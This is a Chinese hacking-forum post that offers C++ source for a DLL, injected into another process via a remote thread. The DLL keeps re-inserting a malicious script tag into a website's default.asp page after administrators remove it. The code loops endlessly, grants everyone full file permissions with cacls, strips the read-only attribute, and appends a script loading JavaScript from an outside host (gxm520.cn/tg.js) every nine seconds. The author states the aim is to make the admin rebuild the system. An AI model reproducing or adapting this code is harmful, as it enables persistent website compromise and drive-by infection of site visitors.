http://www.heibai.net/ARTICLE/INFO/info.php?infoid=41180
本人挂马语句经常被管理员KILL,但是自己也有管理员权限,保留的很好,既然被他发现了,怎么说我们也要强行挂上1天到2天,让他去重做系统去。下面是一个简单的监控某个文件,给予他访问的权限。然后在检查代码中有无我们事先插入的代码,没的话就插入,有的话,等等在检查便。如此循环。此程序只提供个简单的思路,无自启动代码。只实现这个功能,关于进程隐藏,自启动自己解决。因我是一个EXE远程线程插入DLL。所以我的主程序是个DLL文件,因此代码是个DLL工程。
代码如下:
#include "stdafx.h"
#include "process.h"
#include "windows.h"
#include "string.h"
#include "iostream.h"
#include "fstream.h"
char path2[256]="E:\\gxm\\default.asp";
char guama[256]="\n<script language="javascript" src='http://www.gxm520.cn/tg.js'></script>";
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch ( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH:
{
while(1)
{
ifstream ifs(path2);
char FileContent[5000];
memset(FileContent,0,5000);//初始化FileContent
ifs.read(FileContent,5000);//读取数据
ifs.close();//关闭ifstream对像
if(strstr(FileContent,guama)==0)
{
char path1[256]="E:\\gxm\\default.asp "; //比变量path2多了一个空格
char mingling[256]="cacls ";
strcat(mingling,path1);
char ps[25]="/T /E /C /G everyone:F";
strcat(mingling,ps);
char mingling1[256]="cacls ";
strcat(mingling1,path1);
char pa[30]="/T /E /C /G administrator:F";
strcat(mingling1,pa);
system(mingling);
system(mingling1);
SetFileAttributes(path2,GetFileAttributes(path1) & ~FILE_ATTRIBUTE_READONLY);
ofstream outfile;
outfile.open(path2,ios::app);
if (!outfile)
{
exit(0);
}
outfile<<guama;
outfile.close();
}
Sleep(9000);
}
}
default:
return TRUE;
}
return TRUE;
}
简单的监控文件程序的代码而已,我也不知道别人是怎么写的,反正自己是这样想出来一点一点的写点,希望对我们一样菜的人有点帮助
- 上一篇: 转帖:木马编程之线程守护
- 下一篇: 转帖:编程之修改文件修改时间的程序
-
精密半导体参数测试解决方案 直播时间: 01月08日 10:00
/3 
文章评论(0条评论)
登录后参与讨论